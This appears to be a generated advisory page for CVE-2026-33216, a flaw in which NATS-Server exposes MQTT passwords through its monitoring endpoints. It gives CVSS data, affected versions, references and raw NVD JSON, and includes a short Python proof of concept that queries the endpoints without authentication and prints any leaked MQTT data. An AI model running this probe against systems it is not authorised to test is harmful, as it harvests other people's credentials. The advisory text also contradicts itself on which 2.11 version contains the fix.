Security Vulnerability Report
CVE-2026-33216 CVSS 8.6 HIGH

Published: 2026-03-25 20:16:32
Last Modified: 2026-03-26 17:14:04

Description

NATS-Server is a high-performance server for NATS.io, a cloud- and edge-native messaging system. Prior to versions 2.11.15 and 2.12.6, in MQTT deployments that authenticate with usercodes/passwords, MQTT passwords are incorrectly classified as a non-authenticating identity statement (JWT) and exposed via the monitoring endpoints. Versions 2.11.14 and 2.12.6 contain a fix. As a workaround, ensure the monitoring endpoints are adequately secured. Best practice remains not to expose the monitoring endpoint to the Internet or to other untrusted network users.

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* (NATS-Server < 2.11.15) - VULNERABLE
cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* (NATS-Server >= 2.12.0, < 2.12.6) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# PoC for CVE-2026-33216: NATS-Server MQTT Password Leak
# This script attempts to retrieve MQTT passwords from the monitoring endpoint.


def check_vulnerability(target_url):
    # Common monitoring endpoints for NATS
    endpoints = ["/varz", "/connz", "/routez", "/gatewayz"]
    print(f"[*] Checking target: {target_url}")
    for endpoint in endpoints:
        try:
            url = f"{target_url.rstrip('/')}{endpoint}"
            # Send request without authentication (PR:N)
            response = requests.get(url, timeout=5)
            if response.status_code == 200:
                data = response.text
                # Check for presence of MQTT related data and potential password leaks
                # In vulnerable versions, passwords might appear in 'jwt' or user fields
                if "mqtt" in data.lower():
                    print(f"[+] Potential MQTT data found at {url}")
                    print("[!] Review the following output for exposed passwords:")
                    print(data[:500])  # Print snippet for analysis
                    return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
    print("[-] No vulnerable endpoints exposed or no MQTT data found.")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python poc.py <http://target:port>")
        sys.exit(1)
    target = sys.argv[1]
    check_vulnerability(target)
```

References

https://advisories.nats.io/CVE/secnote-2026-05.txt (Vendor Advisory, Mitigation)
https://github.com/nats-io/nats-server/commit/b5b63cfc35a57075e09c1f57503d31721bed8099 (Patch)
https://github.com/nats-io/nats-server/security/advisories/GHSA-v722-jcv5-w7mc (Vendor Advisory, Mitigation)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33216",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-25T20:16:32.320",
    "lastModified": "2026-03-26T17:14:04.097",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, for MQTT deployments using usercodes/passwords: MQTT passwords are incorrectly classified as a non-authenticating identity statement (JWT) and exposed via monitoring endpoints. Versions 2.11.14 and 2.12.6 contain a fix. As a workaround, ensure monitoring end-points are adequately secured. Best practice remains to not expose the monitoring endpoint to the Internet or other untrusted network users."},
      {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del borde. Antes de las versiones 2.11.15 y 2.12.6, para implementaciones de MQTT que utilizan códigos de usuario/contraseñas: las contraseñas de MQTT se clasifican incorrectamente como una declaración de identidad no autenticadora (JWT) y se exponen a través de los puntos finales de monitoreo. Las versiones 2.11.14 y 2.12.6 contienen una corrección. Como solución alternativa, asegúrese de que los puntos finales de monitoreo estén adecuadamente protegidos. La mejor práctica sigue siendo no exponer el punto final de monitoreo a Internet u otros usuarios de red no confiables."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"},
          "exploitabilityScore": 3.9,
          "impactScore": 4.0
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"},
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-256"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.15", "matchCriteriaId": "13EA156E-2759-4586-A22E-CDEAAD4D610C"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://advisories.nats.io/CVE/secnote-2026-05.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]},
      {"url": "https://github.com/nats-io/nats-server/commit/b5b63cfc35a57075e09c1f57503d31721bed8099", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-v722-jcv5-w7mc", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}
    ]
  }
}
```